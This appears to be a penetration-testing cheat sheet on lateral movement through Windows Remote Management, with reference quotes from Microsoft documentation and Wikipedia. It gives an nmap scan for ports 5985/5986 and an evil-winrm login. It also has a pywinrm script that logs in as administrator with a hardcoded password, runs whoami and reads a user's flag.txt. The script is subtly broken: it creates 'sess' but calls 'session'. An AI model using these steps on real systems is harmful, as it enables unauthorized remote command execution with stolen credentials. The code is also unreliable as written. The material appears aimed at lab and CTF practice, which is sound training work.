bazaar
Windows
Active Directory
Lateral Movement

WinRm : Enter-PSSession / evil-winrm

ports: 5985 (HTTP) and 5986 (HTTPS) (Below Windows 7: 80 and 443)
# finding open ports
nmap -p5985,5986 -iL computers.txt -Pn -v
# Connect from Linux
evil-winrm -i Server01 -u USER -p PASS
# Connect from Windows
Enter-PSSession Server01 
# automation (python3)

# pip install pywinrm # (see ref for optional deps)
# ref: https://pypi.org/project/pywinrm/

import winrm

sess = winrm.Session(
	'10.10.10.10', 
	auth=(
		'administrator',
		'badminton'
	),
	transport='ntlm'
)

# run powershell command
r = session.run_ps("whoami")
print(r.std_out)
print(r.std_err)

# run
print(session.run("type c://users//mike//Desktop//flag.txt").std_out)

About WinRm

Using the WS-Management protocol, Windows PowerShell remoting lets you run any Windows PowerShell command on one or more remote computers.

To start an interactive session with a single remote computer, use the Enter-PSSession cmdlet. For example, to start an interactive session with the Server01 remote computer, type:

Enter-PSSession Server01

~ Microsoft Docs1

Microsoft has implemented the WS-Management standard in Windows Remote Management 1.1 (WinRM)

By default WinRM HTTP uses port 80 and HTTPS uses port 443. On Windows 7 and higher the default ports are 5985 and 5986, respectively.
~ Wikipedia2

  1. https://learn.microsoft.com/en-us/powershell/scripting/security/remoting/running-remote-commands?view=powershell-7.4#windows-powershell-remoting ↩︎

  2. https://en.wikipedia.org/wiki/WS-Management ↩︎

AD Enumeration